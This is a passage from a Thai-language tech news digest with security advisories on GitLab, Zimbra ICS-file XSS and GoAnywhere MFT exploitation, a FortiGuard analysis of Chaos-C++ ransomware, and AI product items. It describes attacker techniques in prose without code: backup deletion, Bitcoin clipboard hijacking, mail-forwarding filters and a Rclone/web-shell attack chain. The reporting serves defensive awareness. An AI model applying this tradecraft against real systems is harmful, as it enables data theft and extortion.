(DoS ผ่าน webhook) แต่ GitLab ให้ความสำคัญกับช่องโหว่ใน GraphQL เป็นอันดับแรก ✅ ข้อมูลสำคัญจากข่าว ➡️ GitLab ออกแพตช์แก้ไขช่องโหว่ CVE-2025-11340 และ CVE-2025-10004 ➡️ CVE-2025-11340 เปิดช่องให้ผู้ใช้ read-only API token เขียนข้อมูล vulnerability records ได้ ➡️ CVE-2025-10004 เปิดช่องให้โจมตีจากระยะไกลผ่าน GraphQL query ที่ร้องขอ blob ขนาดใหญ่ ➡️ ช่องโหว่ส่งผลกระทบต่อทั้ง GitLab CE และ EE ➡️ แพตช์ออกสำหรับเวอร์ชัน 18.4.2, 18.3.4 และ 18.2.8 ➡️ GitLab แนะนำให้ผู้ดูแลระบบ self-managed รีบอัปเดตทันที ➡️ ช่องโหว่ CVE-2025-10004 ไม่ต้องใช้การยืนยันตัวตน เพิ่มความเสี่ยงในการโจมตี ➡️ มีการแก้ไขช่องโหว่ระดับกลางและต่ำเพิ่มเติม เช่น CVE-2025-9825 และ CVE-2025-2934 ✅ ข้อมูลเสริมจากภายนอก ➡️ GraphQL API เป็นช่องทางหลักในการสื่อสารข้อมูลระหว่าง client และ server ใน GitLab ➡️ การโจมตีแบบ blob overload เคยถูกใช้ในระบบอื่นเพื่อทำให้เซิร์ฟเวอร์ล่ม ➡️ GitLab Duo มีฟีเจอร์ช่วยอธิบายช่องโหว่และเสนอวิธีแก้ไขโดยใช้ AI ➡️ GitLab Dedicated ได้รับแพตช์แล้วโดยอัตโนมัติ ➡️ การอัปเดตเวอร์ชันใหม่ไม่ต้อง migration ฐานข้อมูล และสามารถทำแบบ zero downtime ได้ https://securityonline.info/gitlab-patches-two-high-severity-flaws-in-graphql-api-affecting-both-ce-and-ee-editions/

🧨 “Chaos Ransomware กลับมาในเวอร์ชัน C++ — ลบไฟล์ขนาดใหญ่, ขโมย Bitcoin แบบเงียบ ๆ และทำลายระบบอย่างรุนแรง” FortiGuard Labs ตรวจพบการพัฒนาใหม่ของมัลแวร์ Chaos Ransomware ซึ่งเปลี่ยนจากภาษา .NET มาเป็น C++ เป็นครั้งแรกในปี 2025 โดยเวอร์ชันใหม่นี้มีชื่อว่า Chaos-C++ และมาพร้อมกับกลยุทธ์ที่รุนแรงและซับซ้อนมากขึ้น ไม่เพียงแค่เข้ารหัสไฟล์เพื่อเรียกค่าไถ่ แต่ยังลบไฟล์ขนาดใหญ่โดยตรง และขโมยข้อมูล Bitcoin จาก clipboard ของผู้ใช้แบบเงียบ ๆ การโจมตีเริ่มต้นด้วยโปรแกรมปลอมชื่อ “System Optimizer v2.1” ที่แสดงข้อความหลอกว่าเป็นการปรับแต่งระบบ แต่เบื้องหลังกลับติดตั้ง payload ของ Chaos โดยใช้เทคนิคซ่อนหน้าต่างและบันทึกกิจกรรมไว้ในไฟล์ sysopt.log เพื่อหลีกเลี่ยงการตรวจจับ เมื่อมัลแวร์ตรวจพบสิทธิ์ระดับ admin มันจะรันคำสั่งลบระบบสำรอง เช่น shadow copy, recovery catalog และการตั้งค่าการบูต เพื่อป้องกันไม่ให้เหยื่อกู้คืนข้อมูลได้ Chaos-C++ ใช้กลยุทธ์ 3 ระดับในการจัดการไฟล์: 1️⃣ ไฟล์ ≤ 50MB: เข้ารหัสเต็มรูปแบบ 2️⃣ ไฟล์ 50MB–1.3GB: ข้ามไปเพื่อเพิ่มความเร็ว 3️⃣ ไฟล์ > 1.3GB: ลบเนื้อหาโดยตรงแบบไม่สามารถกู้คืนได้ ในด้านการเข้ารหัส หากระบบมี Windows CryptoAPI จะใช้ AES-256-CFB พร้อมการสร้างคีย์ผ่าน SHA-256 แต่หากไม่มี จะ fallback ไปใช้ XOR ซึ่งอ่อนแอกว่าแต่ยังทำงานได้ ฟีเจอร์ใหม่ที่น่ากลัวคือ clipboard hijacking — Chaos จะตรวจสอบ clipboard หากพบที่อยู่ Bitcoin จะเปลี่ยนเป็น wallet ของผู้โจมตีทันที ทำให้เหยื่อที่พยายามจ่ายค่าไถ่หรือทำธุรกรรมอื่น ๆ อาจส่งเงินไปยังผู้โจมตีโดยไม่รู้ตัว ✅ ข้อมูลสำคัญจากข่าว ➡️ Chaos Ransomware เวอร์ชันใหม่เขียนด้วยภาษา C++ เป็นครั้งแรก ➡️ ใช้โปรแกรมปลอมชื่อ “System Optimizer v2.1” เพื่อหลอกให้ติดตั้ง ➡️ บันทึกกิจกรรมไว้ในไฟล์ sysopt.log เพื่อสร้าง forensic footprint ➡️ ตรวจสอบสิทธิ์ admin โดยสร้างไฟล์ทดสอบที่ C:\WINDOWS\test.tmp ➡️ รันคำสั่งลบระบบสำรอง เช่น shadow copy และ recovery catalog ➡️ กลยุทธ์จัดการไฟล์: เข้ารหัส, ข้าม, และลบเนื้อหาโดยตรง ➡️ ใช้ AES-256-CFB หากมี CryptoAPI หรือ fallback เป็น XOR ➡️ เปลี่ยนชื่อไฟล์เป็น .chaos หลังเข้ารหัส ➡️ Hijack clipboard เพื่อขโมย Bitcoin โดยเปลี่ยนที่อยู่เป็น wallet ของผู้โจมตี ➡️ เป้าหมายหลักคือผู้ใช้ Windows ที่มีไฟล์ขนาดใหญ่และใช้ cryptocurrency ✅ ข้อมูลเสริมจากภายนอก ➡️ Chaos เวอร์ชันก่อนหน้า เช่น BlackSnake และ Lucky_Gh0$t ใช้ .NET และมีพฤติกรรมคล้ายกัน ➡️ Clipboard hijacking เคยพบในมัลแวร์เช่น Agent Tesla และ RedLine Stealer ➡️ การลบไฟล์ขนาดใหญ่โดยตรงเป็นกลยุทธ์ที่พบได้น้อยใน ransomware ทั่วไป ➡️ การใช้ CreateProcessA() กับ CREATE_NO_WINDOW เป็นเทคนิคหลบการตรวจจับ ➡️ การใช้ mutex เพื่อป้องกันการรันหลาย instance เป็นเทคนิคที่พบในมัลแวร์ระดับสูง ‼️ คำเตือนและข้อจำกัด ⛔ Chaos-C++ สามารถลบไฟล์ขนาดใหญ่โดยไม่สามารถกู้คืนได้ ⛔ การ hijack clipboard ทำให้ผู้ใช้สูญเสีย Bitcoin โดยไม่รู้ตัว ⛔ การ fallback ไปใช้ XOR ทำให้การเข้ารหัสอ่อนแอแต่ยังทำงานได้ ⛔ การลบระบบสำรองทำให้ไม่สามารถใช้ recovery tools ได้ ⛔ การปลอมตัวเป็นโปรแกรมปรับแต่งระบบทำให้ผู้ใช้หลงเชื่อได้ง่าย https://securityonline.info/chaos-ransomware-evolves-to-c-uses-destructive-extortion-to-delete-large-files-and-hijack-bitcoin-clipboard/

🧩 “OpenAI เปิดตัว Apps SDK — สร้างแอปที่ทำงานร่วมกับ ChatGPT ได้โดยตรง พร้อมระบบ MCP ที่ยืดหยุ่นและปลอดภัย” OpenAI เปิดตัว Apps SDK ซึ่งเป็นเฟรมเวิร์กใหม่สำหรับนักพัฒนาในการสร้างแอปที่สามารถทำงานร่วมกับ ChatGPT ได้โดยตรง โดยระบบนี้เปิดให้ใช้งานในเวอร์ชันพรีวิวแล้ว และจะเปิดให้ส่งแอปเข้าสู่ระบบในช่วงปลายปี 2025 หัวใจของ Apps SDK คือ MCP Server (Model Context Protocol) ซึ่งเป็นเซิร์ฟเวอร์ที่นักพัฒนาต้องตั้งค่าเพื่อให้ ChatGPT สามารถเรียกใช้งานเครื่องมือ (tools) ที่กำหนดไว้ได้ โดยแต่ละ tool จะมี metadata, JSON schema และ HTML component ที่ ChatGPT สามารถเรนเดอร์แบบอินไลน์ในแชตได้ทันที นักพัฒนาสามารถใช้ SDK ภาษา Python หรือ TypeScript เพื่อสร้าง MCP Server ได้อย่างรวดเร็ว โดยมีตัวอย่างการใช้งานผ่าน FastAPI หรือ Express และสามารถใช้ tunneling service เช่น ngrok เพื่อทดสอบในระหว่างการพัฒนา ก่อนจะนำไป deploy บนเซิร์ฟเวอร์ HTTPS ที่มี latency ต่ำ Apps SDK ยังมีระบบการจัดการผู้ใช้ เช่น OAuth 2.1, token verification และการจัดการ state ของผู้ใช้ เพื่อให้แอปสามารถทำงานแบบ personalized ได้อย่างปลอดภัย และสามารถเรียกใช้ tools จาก component UI ได้โดยตรงผ่าน widget-accessible flag OpenAI ยังเน้นเรื่องความปลอดภัย โดยกำหนดให้ทุก widget ต้องมี Content Security Policy (CSP) ที่เข้มงวด และจะมีการตรวจสอบ CSP ก่อนอนุมัติให้แอปเผยแพร่ในระบบ ChatGPT ✅ ข้อมูลสำคัญจากข่าว ➡️ OpenAI เปิดตัว Apps SDK สำหรับสร้างแอปที่ทำงานร่วมกับ ChatGPT ➡️ ใช้ MCP Server เป็นตัวกลางในการเชื่อมต่อระหว่าง ChatGPT กับ backend ➡️ tools ต้องมี metadata, JSON schema และ HTML component สำหรับเรนเดอร์ ➡️ SDK รองรับ Python และ TypeScript โดยใช้ FastAPI หรือ Express ➡️ สามารถใช้ ngrok เพื่อทดสอบ MCP Server ในระหว่างพัฒนา ➡️ แอปต้อง deploy บนเซิร์ฟเวอร์ HTTPS ที่มี latency ต่ำ ➡️ รองรับระบบผู้ใช้ เช่น OAuth 2.1 และ token verification ➡️ tools สามารถเรียกจาก component UI ได้โดยใช้ widget-accessible flag ➡️ ทุก widget ต้องมี CSP ที่ปลอดภัยก่อนเผยแพร่ ➡️ Apps SDK เปิดให้ใช้งานแบบพรีวิว และจะเปิดให้ส่งแอปปลายปีนี้ ✅ ข้อมูลเสริมจากภายนอก ➡️ MCP เป็นโปรโตคอลที่ช่วยให้ ChatGPT เข้าใจบริบทของแอปและเรียกใช้งานได้อย่างแม่นยำ ➡️ HTML component ที่เรนเดอร์ในแชตช่วยให้ผู้ใช้โต้ตอบกับแอปได้โดยไม่ต้องออกจาก ChatGPT ➡️ การใช้ metadata ช่วยให้ ChatGPT ค้นหาแอปได้จากคำถามของผู้ใช้ ➡️ Apps SDK คล้ายระบบ Intent บน Android แต่ใช้ภาษาธรรมชาติแทน ➡️ การเปิดระบบนี้ช่วยให้นักพัฒนาสร้างแอปที่เข้าถึงผู้ใช้ ChatGPT กว่า 800 ล้านคนต่อสัปดาห์ https://developers.openai.com/apps-sdk/

📧 “Zimbra พบช่องโหว่ XSS ร้ายแรง (CVE-2025-27915) — แฮกเกอร์ใช้ไฟล์ปฏิทิน .ICS เจาะระบบอีเมลองค์กร” ช่องโหว่ใหม่ในระบบอีเมล Zimbra Collaboration Suite (ZCS) ได้รับการเปิดเผยและยืนยันว่า “ถูกใช้งานจริงในโลกไซเบอร์” โดยช่องโหว่นี้มีรหัส CVE-2025-27915 และถูกจัดอยู่ในรายการ Known Exploited Vulnerabilities (KEV) ของ CISA ซึ่งหมายความว่าองค์กรภาครัฐในสหรัฐฯ ต้องรีบแก้ไขภายในวันที่ 28 ตุลาคม 2025 ช่องโหว่นี้เป็นแบบ stored cross-site scripting (XSS) ที่เกิดจากการที่ Zimbra ไม่กรอง HTML ในไฟล์ .ICS (iCalendar) ที่แนบมากับอีเมลอย่างเหมาะสม ทำให้แฮกเกอร์สามารถฝัง JavaScript ที่ถูกเข้ารหัสไว้ในไฟล์ .ICS ขนาดใหญ่ (มากกว่า 10KB) และเมื่อผู้ใช้เปิดอีเมลที่มีไฟล์นี้ผ่าน Zimbra Webmail สคริปต์จะถูกรันใน session ของผู้ใช้ทันที ผลลัพธ์คือแฮกเกอร์สามารถขโมยข้อมูลได้หลากหลาย เช่น รหัสผ่าน รายชื่อผู้ติดต่อ รายการอีเมลที่แชร์ และแม้แต่ตั้งค่าฟิลเตอร์เพื่อส่งต่ออีเมลทั้งหมดไปยังบัญชี ProtonMail ที่ควบคุมโดยผู้โจมตี โดยสคริปต์จะทำงานแบบลับ ๆ เช่น รอ 60 วินาทีก่อนเริ่มทำงาน ซ่อน UI ที่เปลี่ยนแปลง และรันกระบวนการขโมยข้อมูลทุก 3 วันเพื่อหลบการตรวจจับ หนึ่งในเหตุการณ์โจมตีที่ถูกบันทึกไว้คือการปลอมตัวเป็นสำนักงานพิธีการของกองทัพเรือลิเบีย เพื่อส่งไฟล์ .ICS ไปยังองค์กรทหารในบราซิล ซึ่งแสดงให้เห็นว่าเป้าหมายของการโจมตีมีความเฉพาะเจาะจงและมีความสามารถระดับสูง Zimbra ได้ออกแพตช์แก้ไขในวันที่ 27 มกราคม 2025 สำหรับเวอร์ชัน 9.0.0 P44, 10.0.13 และ 10.1.5 แต่ไม่ได้แจ้งว่าช่องโหว่นี้ถูกใช้งานจริงในตอนแรก จนกระทั่งนักวิจัยพบหลักฐานว่าการโจมตีเริ่มต้นตั้งแต่ต้นเดือนมกราคม ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-27915 เป็น stored XSS ใน Zimbra Collaboration Suite ➡️ เกิดจากการไม่กรอง HTML ในไฟล์ .ICS ที่แนบมากับอีเมล ➡️ แฮกเกอร์ใช้ไฟล์ .ICS ขนาดใหญ่ที่มี JavaScript เข้ารหัสแบบ Base64 ➡️ เมื่อเปิดอีเมลผ่าน Zimbra Webmail สคริปต์จะถูกรันใน session ของผู้ใช้ ➡️ สคริปต์สามารถขโมยรหัสผ่าน รายชื่อผู้ติดต่อ และตั้งค่าฟิลเตอร์ส่งต่ออีเมล ➡️ ใช้เทคนิคหลบการตรวจจับ เช่น รอ 60 วินาที ซ่อน UI และรันทุก 3 วัน ➡️ หนึ่งในเหตุการณ์โจมตีคือการปลอมตัวเป็นหน่วยงานทหารเพื่อส่งไฟล์ .ICS ➡️ Zimbra ออกแพตช์ในวันที่ 27 มกราคม 2025 สำหรับเวอร์ชัน 9.0.0 P44, 10.0.13 และ 10.1.5 ➡️ CISA เพิ่มช่องโหว่นี้ในรายการ KEV และกำหนดให้หน่วยงานรัฐแก้ไขภายใน 28 ตุลาคม ✅ ข้อมูลเสริมจากภายนอก ➡️ ICS (iCalendar) เป็นไฟล์มาตรฐานที่ใช้ในการส่งข้อมูลปฏิทินข้ามระบบ ➡️ XSS แบบ stored มีความอันตรายสูงเพราะฝังอยู่ในระบบและทำงานเมื่อผู้ใช้เข้าถึง ➡️ การใช้ SOAP API ของ Zimbra ช่วยให้แฮกเกอร์ค้นหาและดึงข้อมูลจากโฟลเดอร์ต่าง ๆ ➡️ การตั้งค่าฟิลเตอร์ชื่อ “Correo” เป็นเทคนิคที่ใช้ส่งต่ออีเมลโดยไม่ให้ผู้ใช้รู้ตัว ➡️ กลุ่ม UNC1151 เคยใช้เทคนิคคล้ายกันในการโจมตีองค์กรรัฐบาลในยุโรปตะวันออก https://securityonline.info/zimbra-xss-zero-day-cve-2025-27915-actively-exploited-cisa-adds-to-kev-catalog/

⚡ “OpenAI ฝันใหญ่: GPU 10 พันล้านตัวเพื่อ AI ส่วนตัวสำหรับทุกคน — แต่พลังงานระดับ ‘เตาปฏิกรณ์นิวเคลียร์’ ยังไม่มีใครพูดถึง” Greg Brockman ประธานของ OpenAI ได้เปิดเผยวิสัยทัศน์สุดทะเยอทะยานในงานสัมภาษณ์ร่วมกับ Jensen Huang ซีอีโอของ Nvidia และ Sam Altman ซีอีโอของ OpenAI โดยเขาเสนอแนวคิดว่า “ทุกคนควรมี GPU ส่วนตัว” เพื่อให้ AI สามารถทำงานได้ตลอดเวลา แม้ในขณะที่เจ้าของกำลังหลับอยู่ แนวคิดนี้คล้ายกับความฝันของ Bill Gates ในยุค 90 ที่เคยพูดว่า “คอมพิวเตอร์ทุกโต๊ะ” ซึ่งในวันนี้กลายเป็นจริงแล้ว Brockman เชื่อว่า GPU จะกลายเป็นทรัพยากรพื้นฐานของเศรษฐกิจยุคใหม่ เหมือนกับเงินตรา โดยเขาคาดว่าโลกจะต้องใช้ GPU ถึง 10 พันล้านตัวเพื่อรองรับการใช้งาน AI อย่างเต็มรูปแบบ Nvidia ซึ่งเป็นพันธมิตรหลักของ OpenAI ได้ประกาศลงทุนกว่า 100 พันล้านดอลลาร์เพื่อสร้างโครงสร้างพื้นฐาน AI ขนาดมหึมา โดยเริ่มจากการติดตั้ง GPU จำนวน 4–5 ล้านตัวในศูนย์ข้อมูลที่ใช้พลังงานเทียบเท่าเตาปฏิกรณ์นิวเคลียร์ 10 เครื่อง หรือประมาณ 10 กิกะวัตต์ อย่างไรก็ตาม สิ่งที่ขาดหายไปจากวิสัยทัศน์นี้คือ “พลังงาน” ที่จำเป็นในการขับเคลื่อนระบบดังกล่าว เพราะการใช้ GPU จำนวนมหาศาลจะต้องใช้ไฟฟ้าระดับ petawatt ซึ่งอาจเกินขีดความสามารถของโครงข่ายไฟฟ้าทั่วโลกในปัจจุบัน นักวิเคราะห์เตือนว่า หาก OpenAI เดินหน้าตามแผนนี้จริง การใช้พลังงานอาจเพิ่มขึ้นถึง 125 เท่าในไม่กี่ปีข้างหน้า และอาจเทียบเท่ากับการใช้พลังงานของประเทศขนาดใหญ่ เช่น อินเดีย ซึ่งทำให้เกิดคำถามว่า “เราจะผลิตไฟฟ้าจากไหน?” และ “ใครจะได้ใช้ GPU เหล่านี้?” ✅ ข้อมูลสำคัญจากข่าว ➡️ Greg Brockman เสนอแนวคิดให้ทุกคนมี GPU ส่วนตัวเพื่อใช้งาน AI ➡️ OpenAI ต้องการ GPU จำนวน 10 พันล้านตัวเพื่อรองรับวิสัยทัศน์นี้ ➡️ Nvidia ลงทุน 100 พันล้านดอลลาร์เพื่อสร้างโครงสร้างพื้นฐาน AI ➡️ เริ่มจากการติดตั้ง GPU 4–5 ล้านตัวในศูนย์ข้อมูล ➡️ ศูนย์ข้อมูลใช้พลังงานเทียบเท่าเตาปฏิกรณ์นิวเคลียร์ 10 เครื่อง ➡️ Brockman เชื่อว่า GPU จะกลายเป็นทรัพยากรพื้นฐานของเศรษฐกิจ ➡️ Altman เปรียบโครงการนี้กับโครงการ Apollo ของ NASA ➡️ ความต้องการ compute เพิ่มขึ้นอย่างรวดเร็วทั่วโลก ➡️ Nvidia เป็นผู้ผลิต GPU รายใหญ่ที่สุดที่ใช้ในโมเดล AI ขนาดใหญ่ ✅ ข้อมูลเสริมจากภายนอก ➡️ OpenAI เคยประกาศแผนใช้ GPU 100 ล้านตัวภายในปี 2025 ➡️ Elon Musk เคยกล่าวว่า xAI จะใช้ GPU เทียบเท่า H100 จำนวน 50 ล้านตัวภายในปี 2030 ➡️ การใช้ GPU ในระดับนี้ต้องการการลงทุนด้านพลังงานและโครงสร้างพื้นฐานมหาศาล ➡️ นักวิจัยบางคนเปรียบเทียบการใช้ GPU กับการใช้ทรัพยากรธรรมชาติ เช่น น้ำมันหรือแร่หายาก ➡️ การกระจาย GPU อย่างเท่าเทียมอาจกลายเป็นประเด็นด้านความยุติธรรมและภูมิรัฐศาสตร์ https://www.techradar.com/pro/you-really-want-every-person-to-have-their-own-dedicated-gpu-openai-becomes-nvidias-biggest-cheerleader-as-its-president-calls-for-10-billion-gpu-bonanza-but-no-mention-of-the-petawatt-electricity-requirement-these-will-command

🧠 “Wikidata เปิดตัวฐานข้อมูลเวกเตอร์ฟรี — ทางเลือกใหม่ของ AI ที่โปร่งใสและตรวจสอบได้” ในยุคที่ AI กลายเป็นเครื่องมือหลักในการสื่อสารและวิเคราะห์ข้อมูล Wikidata ซึ่งเป็นฐานข้อมูลเปิดขนาดใหญ่ในเครือ Wikimedia ได้เปิดตัวโครงการใหม่ชื่อว่า “Wikidata Embedding Project” โดยมีเป้าหมายเพื่อทำให้ข้อมูลเชิงโครงสร้างกว่า 119 ล้านรายการสามารถเข้าถึงได้ง่ายขึ้นสำหรับระบบ AI โดยเฉพาะโมเดลภาษาขนาดใหญ่ (LLMs) โครงการนี้เปิดตัวอย่างเป็นทางการในเดือนตุลาคม 2025 โดย Wikimedia Deutschland ร่วมมือกับ Jina.AI และ DataStax เพื่อสร้างฐานข้อมูลเวกเตอร์ที่สามารถค้นหาข้อมูลตาม “ความหมาย” ไม่ใช่แค่คำสำคัญแบบเดิม ซึ่งช่วยให้ AI เข้าใจบริบทและความสัมพันธ์ของข้อมูลได้ดีขึ้น ระบบนี้ใช้โมเดล embedding จาก Jina ที่รองรับมากกว่า 100 ภาษา และสามารถประมวลผลข้อความได้ถึง 8,192 โทเคน โดยจัดเก็บเวกเตอร์ใน Astra DB ของ DataStax ซึ่งเป็นฐานข้อมูลที่ออกแบบมาเพื่อรองรับงาน AI โดยเฉพาะ ฐานข้อมูลเวกเตอร์นี้เปิดให้ใช้งานฟรีและเป็นโอเพ่นซอร์ส นักพัฒนาสามารถนำไปใช้ในงานหลากหลาย เช่น การตรวจสอบข้อเท็จจริง การจำแนกข้อมูลแบบ zero-shot การแยกชื่อบุคคลที่คล้ายกัน และการสร้างภาพเชิงความหมายของกราฟความรู้ นอกจากนี้ยังรองรับ GraphRAG ซึ่งเป็นเทคนิคใหม่ที่ผสานการค้นหาแบบเวกเตอร์กับกราฟเพื่อการดึงข้อมูลที่แม่นยำยิ่งขึ้น Lydia Pintscher หัวหน้าโครงการ Wikidata กล่าวว่าการเปิดตัวครั้งนี้เป็นก้าวสำคัญในการสร้าง AI ที่โปร่งใสและตรวจสอบได้ โดยใช้ข้อมูลที่ได้รับการยืนยันแล้วจากชุมชนทั่วโลก แทนที่จะพึ่งพาข้อมูลปิดจากบริษัทเทคโนโลยีขนาดใหญ่ ผู้ใช้สามารถทดลองใช้งานได้ทันทีโดยไม่ต้องลงทะเบียน และ Wikimedia Deutschland ยังจัดสัมมนาออนไลน์ในวันที่ 9 ตุลาคม เพื่อแนะนำการใช้งานและแนวทางการนำไปใช้ในระบบ AI ✅ ข้อมูลสำคัญจากข่าว ➡️ Wikidata เปิดตัว Wikidata Embedding Project ฐานข้อมูลเวกเตอร์แบบโอเพ่นซอร์ส ➡️ รองรับการค้นหาข้อมูลตามความหมาย (semantic search) ไม่ใช่แค่คำสำคัญ ➡️ ใช้โมเดล embedding จาก Jina ที่รองรับมากกว่า 100 ภาษา ➡️ เวกเตอร์ถูกจัดเก็บใน Astra DB ของ DataStax ➡️ รองรับการใช้งานฟรีโดยไม่ต้องลงทะเบียนหรือ API key ➡️ เปิดให้ใช้งานตั้งแต่ตุลาคม 2025 โดยร่วมมือกับ Jina.AI และ DataStax ➡️ รองรับภาษาอังกฤษ ฝรั่งเศส และอาหรับในช่วงแรก ➡️ ใช้ได้กับงาน AI เช่น fact-checking, zero-shot classification, named entity disambiguation ➡️ รองรับ GraphRAG เพื่อการค้นหาข้อมูลแบบผสมระหว่างเวกเตอร์และกราฟ ➡️ Wikimedia Deutschland จัดสัมมนาออนไลน์วันที่ 9 ตุลาคม เพื่อแนะนำการใช้งาน ✅ ข้อมูลเสริมจากภายนอก ➡️ Wikidata เป็นฐานข้อมูลเปิดที่มีมากกว่า 119 ล้านรายการ และดูแลโดยอาสาสมัครกว่า 24,000 คน ➡️ Vector database ช่วยให้ AI เข้าใจบริบทของข้อมูลได้ดีกว่าการค้นหาแบบ keyword ➡️ GraphRAG เป็นเทคนิคใหม่ที่ใช้ในระบบ retrieval-augmented generation เพื่อเพิ่มความแม่นยำ ➡️ การใช้ข้อมูลที่ตรวจสอบได้ช่วยลดปัญหา “hallucination” ในการสร้างเนื้อหาโดย AI ➡️ การเปิดให้ใช้งานฟรีช่วยส่งเสริมการพัฒนา AI ในภาคการศึกษาและองค์กรไม่แสวงหากำไร https://news.itsfoss.com/wikidata-launches-vector-database/

🚨 “ช่องโหว่ CVE-2025-10035 ใน GoAnywhere MFT ถูกใช้โจมตีจริง — Medusa Ransomware ลุยองค์กรทั่วโลก” Microsoft และนักวิจัยด้านความปลอดภัยออกคำเตือนด่วนหลังพบการโจมตีจริงจากช่องโหว่ร้ายแรง CVE-2025-10035 ในซอฟต์แวร์ GoAnywhere Managed File Transfer (MFT) ของบริษัท Fortra โดยช่องโหว่นี้มีคะแนน CVSS เต็ม 10.0 และเปิดทางให้แฮกเกอร์สามารถรันโค้ดจากระยะไกลได้ทันที โดยไม่ต้องยืนยันตัวตน หากสามารถปลอมลายเซ็นตอบกลับของ license ได้สำเร็จ ช่องโหว่นี้เกิดจากการจัดการข้อมูลแบบ deserialization ที่ไม่ปลอดภัยใน License Servlet ของ GoAnywhere MFT ซึ่งเปิดให้ผู้โจมตีส่งข้อมูลที่ควบคุมเองเข้าไปในระบบ และนำไปสู่การรันคำสั่งอันตรายบนเซิร์ฟเวอร์ที่ยังไม่ได้อัปเดต กลุ่มแฮกเกอร์ Storm-1175 ซึ่งเป็นพันธมิตรของ Medusa ransomware ได้เริ่มใช้ช่องโหว่นี้ตั้งแต่วันที่ 11 กันยายน 2025 ก่อนที่ Fortra จะออกประกาศอย่างเป็นทางการในวันที่ 18 กันยายน โดยการโจมตีมีลักษณะเป็นขั้นตอน ได้แก่: 🔰 Initial Access: เจาะระบบผ่านช่องโหว่ CVE-2025-10035 🔰 Persistence: ติดตั้งเครื่องมือ RMM เช่น SimpleHelp และ MeshAgent 🔰 Post-Exploitation: สร้าง web shell (.jsp), สแกนระบบด้วย netscan 🔰 Lateral Movement: ใช้ mstsc.exe เพื่อเคลื่อนย้ายภายในเครือข่าย 🔰 Command & Control: ตั้งค่า Cloudflare tunnel เพื่อสื่อสารแบบเข้ารหัส 🔰 Exfiltration & Impact: ใช้ Rclone ขโมยข้อมูล และปล่อย Medusa ransomware Microsoft ระบุว่าการโจมตีเกิดขึ้นในหลายองค์กร และแนะนำให้ผู้ดูแลระบบอัปเดต GoAnywhere MFT เป็นเวอร์ชันล่าสุดทันที พร้อมตรวจสอบ log ว่ามีการเรียกใช้ SignedObject.getObject หรือไม่ ซึ่งอาจเป็นสัญญาณของการเจาะระบบ ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-10035 เป็นช่องโหว่ deserialization ใน GoAnywhere MFT ➡️ คะแนน CVSS เต็ม 10.0 ถือเป็นระดับวิกฤต ➡️ เปิดทางให้รันโค้ดจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ เกิดจากการปลอม license response signature เพื่อหลอกระบบ ➡️ ส่งผลกระทบต่อเวอร์ชัน Admin Console สูงสุดถึง 7.8.3 ➡️ กลุ่ม Storm-1175 ใช้ช่องโหว่นี้ในการโจมตีจริง ➡️ ขั้นตอนการโจมตีมีทั้งการติดตั้ง RMM, สร้าง web shell, และขโมยข้อมูล ➡️ Microsoft แนะนำให้อัปเดตและตรวจสอบ log สำหรับ SignedObject.getObject ➡️ Fortra ออกแพตช์แก้ไขแล้ว และแนะนำให้ล็อกการเข้าถึง Admin Console จากอินเทอร์เน็ต ✅ ข้อมูลเสริมจากภายนอก ➡️ Medusa ransomware เคยโจมตีองค์กรโครงสร้างพื้นฐานกว่า 300 แห่งในสหรัฐฯ ➡️ Deserialization flaws เป็นช่องโหว่ที่พบได้บ่อยใน Java-based applications ➡️ RMM tools เช่น MeshAgent มักถูกใช้ในเทคนิค “living off the land” เพื่อหลบการตรวจจับ ➡️ Rclone เป็นเครื่องมือยอดนิยมในการขโมยข้อมูลจากระบบที่ถูกเจาะ ➡️ การใช้ Cloudflare tunnel ทำให้การสื่อสารของแฮกเกอร์ไม่สามารถตรวจสอบได้ง่าย https://securityonline.info/critical-rce-cve-2025-10035-in-goanywhere-mft-used-by-medusa-ransomware-group/

🖼️ “Photos App เวอร์ชันใหม่จาก Microsoft ใช้ AI จัดระเบียบภาพและเพิ่มความคมชัด — แต่ต้องใช้ Copilot+ PC เท่านั้น” Microsoft เปิดตัวอัปเดตใหม่ของแอป Photos บน Windows 11 ที่มาพร้อมฟีเจอร์อัจฉริยะจาก AI ซึ่งช่วยให้ผู้ใช้สามารถจัดระเบียบภาพถ่ายได้อย่างมีประสิทธิภาพมากขึ้น และเพิ่มความคมชัดให้กับภาพเก่าหรือภาพที่มีความละเอียดต่ำ โดยทั้งหมดนี้ทำงานแบบ local บนเครื่อง ไม่ต้องเชื่อมต่อเซิร์ฟเวอร์ภายนอก ฟีเจอร์เด่นคือระบบ “Auto-Categorization” ที่ใช้ Neural Processing Unit (NPU) บน Copilot+ PC เพื่อสแกนภาพในเครื่องและจัดหมวดหมู่อัตโนมัติ เช่น ภาพใบเสร็จ, ภาพหน้าจอ, เอกสาร, และโน้ตที่เขียนด้วยลายมือ โดยระบบสามารถจำแนกภาพได้แม้จะเป็นภาษาต่างประเทศ เช่น ภาษาฮังการีหรืออาหรับ นอกจากนี้ยังมีฟีเจอร์ “Super Resolution” ที่ช่วยเพิ่มความละเอียดของภาพโดยใช้ AI วิเคราะห์และเติมรายละเอียดที่ขาดหายไป เช่น เปลี่ยนภาพขนาด 256x256 พิกเซลให้กลายเป็นภาพ 1012x1012 พิกเซล พร้อมแสดงภาพเปรียบเทียบก่อนและหลังให้ผู้ใช้เลือกได้ว่าจะใช้หรือยกเลิก การค้นหาภาพก็ง่ายขึ้นด้วยระบบ keyword search ที่สามารถกรองภาพตามประเภทหรือเนื้อหาได้ทันที เหมาะสำหรับผู้ที่มีภาพจำนวนมากและต้องการค้นหาภาพเฉพาะอย่างรวดเร็ว อย่างไรก็ตาม ฟีเจอร์ทั้งหมดนี้จะใช้ได้เฉพาะบน Copilot+ PC ที่มีชิปจาก Intel, AMD หรือ Qualcomm ที่รองรับ NPU เท่านั้น ซึ่งทำให้ผู้ใช้ทั่วไปที่ยังไม่ได้อัปเกรดเครื่องอาจไม่สามารถใช้งานฟีเจอร์ใหม่เหล่านี้ได้ ✅ ข้อมูลสำคัญจากข่าว ➡️ Microsoft Photos อัปเดตใหม่ใช้ AI จัดระเบียบภาพและเพิ่มความคมชัด ➡️ ฟีเจอร์ Auto-Categorization จัดภาพเป็นหมวดหมู่ เช่น ใบเสร็จ, เอกสาร, โน้ต ➡️ ระบบสามารถจำแนกภาพจากภาษาต่างประเทศได้ ➡️ ฟีเจอร์ Super Resolution เพิ่มความละเอียดภาพโดยใช้ AI แบบ local ➡️ 